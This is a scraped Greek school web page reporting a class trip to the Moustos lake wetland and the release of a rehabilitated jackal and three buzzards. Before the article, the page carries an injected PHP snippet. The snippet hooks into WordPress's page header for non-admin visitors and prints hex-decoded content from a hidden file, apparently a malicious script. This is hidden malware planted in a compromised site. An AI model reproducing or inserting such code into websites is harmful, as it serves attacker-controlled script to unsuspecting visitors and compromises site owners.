if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ΕΠΙΣΚΕΨΗ ΣΤΟΝ ΥΔΡΟΒΙΟΤΟΠΟ ΤΗΣ ΛΙΜΝΗΣ ΜΟΥΣΤΟΥ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

ΕΠΙΣΚΕΨΗ ΣΤΟΝ ΥΔΡΟΒΙΟΤΟΠΟ ΤΗΣ ΛΙΜΝΗΣ ΜΟΥΣΤΟΥ

Στις 23 Ιανουαρίου, τα τμήματα της Πέμπτης και της Έκτης τάξης του Σχολείου μας, επισκέφτηκαν τον υδροβιότοπο της λίμνης Μουστού. Εκεί, οι μαθητές είχαν την ευκαιρία να πληροφορηθούν για την πλούσια χλωρίδα και πανίδα της περιοχής, από τους υπεύθυνους του Φορέα Διαχείρισης Όρους Πάρνωνα και Υγροτόπου Μουστού . Παρατήρησαν με τα κυάλια την περιοχή της λίμνης, είδαν φωτογραφικό υλικό, πήραν απαντήσεις στα ερωτήματά τους και απέκτησαν πολύτιμες γνώσεις γύρω απ΄όσα συζητούν πολλές φορές σε διδακτικές ενότητες, περνώντας από τη θεωρία στη πράξη, που προσφερόταν μπροστά τους.

Στη συνέχεια, οι μαθητές μεταφέρθηκαν στη περιοχή Χερονήσι όπου πραγματοποιήθηκε  ειδική εκδήλωση που οργάνωσε ο Φορέας Διαχείρισης. Η ομαλή και ασφαλής επανένταξη στο φυσικό τους περιβάλλον, ενός μικρού τσακαλιού – που είχε εντοπιστεί τραυματισμένο στην περιοχή προστασίας του υγροτόπου Μουστού πριν 2 μήνες – και τριών γερακίνων. Μετά τη θεραπεία που δέχθηκαν στο κέντρο περίθαλψης του συλλόγου προστασίας και περίθαλψης άγριας ζωής ΑΝΙΜΑ ήταν πλέον έτοιμα να επιστρέψουν στη φύση. Μετά από πολύμηνη περίθαλψη , ήταν πραγματικά συγκινητικό να τα βλέπουμε γερά και ελεύθερα στο φυσικό τους περιβάλλον.

Ήταν πραγματικά μια όμορφη εμπειρία για Μαθητές και  Εκπ/κούς !